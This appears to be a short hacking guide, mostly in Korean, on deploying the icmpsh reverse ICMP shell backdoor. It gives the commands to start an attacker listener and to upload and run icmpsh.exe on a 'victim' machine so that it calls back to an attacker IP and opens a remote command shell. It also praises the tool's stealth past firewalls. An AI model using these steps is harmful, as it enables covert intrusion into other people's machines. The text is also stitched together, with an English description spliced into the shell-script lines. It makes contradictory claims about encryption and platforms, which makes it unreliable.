https://github.com/inquisb/icmpsh에서 백도어를 다운로드하세요.

클라이언트 측

스크립트를 실행하세요: run.sh

오류가 발생하면 다음 줄을 변경해보세요:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

ICMP Shell (icmpsh)

Description

ICMP Shell (icmpsh) is a simple reverse ICMP shell that uses ICMP echo requests to establish a command shell on a target machine. It is a part of the icmpsh project.

Features

• Stealthy communication: ICMP echo requests are commonly allowed through firewalls and are less likely to be detected.

• Reverse shell: Allows an attacker to execute commands on the target machine.

• Encrypted communication: ICMP payload is encrypted using AES-128-CBC.

• Cross-platform: Works on Windows, Linux, and macOS.

Usage

1. Start the listener on the attacker machine:

icmpsh.exe -l -v -d

2. Execute the client on the target machine:

icmpsh.exe -t <attacker_ip> -d

3. Once the connection is established, the attacker can execute commands on the target machine.

Limitations

• Requires administrative privileges on the target machine.

• ICMP echo requests may be blocked by some firewalls or network configurations.

• The communication is not encrypted by default, but can be enabled using the -e option.

Detection

• Monitor network traffic for ICMP echo requests to identify potential ICMP shell activity.

• Use intrusion detection systems (IDS) or network monitoring tools to detect suspicious ICMP traffic.

• Regularly update firewall rules to block ICMP echo requests if not required.

References

• icmpsh - GitHub

echo Please insert the IP where you want to listen
read IP

피해자 측

피해자에게 icmpsh.exe를 업로드하고 실행하세요:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128